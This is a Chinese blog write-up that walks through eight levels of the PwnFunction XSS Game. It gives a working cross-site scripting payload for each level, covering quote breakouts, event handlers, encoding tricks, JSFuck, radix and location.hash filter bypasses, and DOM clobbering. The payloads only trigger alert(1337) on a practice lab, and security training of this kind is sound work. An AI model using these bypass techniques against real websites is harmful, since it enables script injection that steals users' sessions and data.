xss GAME (xss漏洞攻击1-8)

目录

xss网页链接

第一关

第二关

第三关

​编辑第四关

​编辑第五关

​编辑第六关

第七关

第一种 Function构建函数

第二种 tostring parseInt

第三种 silce()

​编辑第八关(安全过滤框架 dom破坏)


xss网页链接

XSS Game - Learning XSS Made Simple! | Created by PwnFunction

第一关

分析源码可知,没有任何过滤,那直接动手操作即可

而且有需求,不能有用户参与,而且必须弹窗1337

第二关

分析:innerText=ma 这个代码 将会把你输入的都将转换为文本

        那么思考一下 绕过双引号 即可

?jeff=a";alert(1337);"

        

第三关

过滤了一些字符 用聚焦解决

?wey=1"%20οnfοcus="alert(1337)"%20autofocus="ture

第四关

?ricardo=javascript:alert(1337)

有setTIMEout 输入进去等待几秒即可

第五关


js不支持编码符号 但是支持字符串
所以location 可以转换字符串

url编码 为实体编码 然后执行
 

?markassbrownlee=<svg%20οnlοad=alert%26%2340%3B1337%26%2341%3B>

第六关

过滤了英文字母 所以直接没办法用英文

jsfuck 这个可以让字母变成 ![] 

eval可以直接执行命令

JSFuck - Write any JavaScript with 6 Characters: []()!+

第七关

限制 0-50 所以上一关无法使用

有三种解法

第一种 Function构建函数

构建一个ALERT(1337)   source 是获取函数原码 toLowerCase() 获取小写 

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

第二种 tostring parseInt

首先得科普一下parseInt 

parseInt,是Javascript内置函数,原型为parseInt ( String s , [ int radix ] ),用于解析一个字符串,并返回一个整数。

tostring 将数字转回为字符串

那么问题来了为啥要 tostring(30) 而不是29 或者 28 呢 

alert 这个 t 必须到30进制才可以转换的到 例子:16进制最大是F 

?mafia=eval(9875141..toString(31))(1337)

第三种 silce()

锚点

location.hash 获取url#后面的值 我们通过切片将alert切出来 

?mafia=eval(location.hash.slice(1))#alert(1337)

第八关(安全过滤框架 dom破坏)

DOM破坏是一种将HTML注入页面以操纵DOM并最终改变页面上JavaScript行为的技术。

就是修改他原来的参数,进行覆盖,最后误以为是正确的

分析源码可知 ok 我们可以覆盖 

我们可以得到两种标签对象: HTMLAreaElement (<area>) & HTMLAnchorElement (<a>) ,这两个
标签对象我们都可以利⽤ href 属性来进⾏字符串转换。
我这里使用a标签

?boomer=<a%20id=ok%20href=tel:alert(1337)>

?boomer=<a%20id=ok%20href=cid:alert(1337)>

这里用到了白名单 tel cid  因为javascript 不可以使用 

  • 11
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值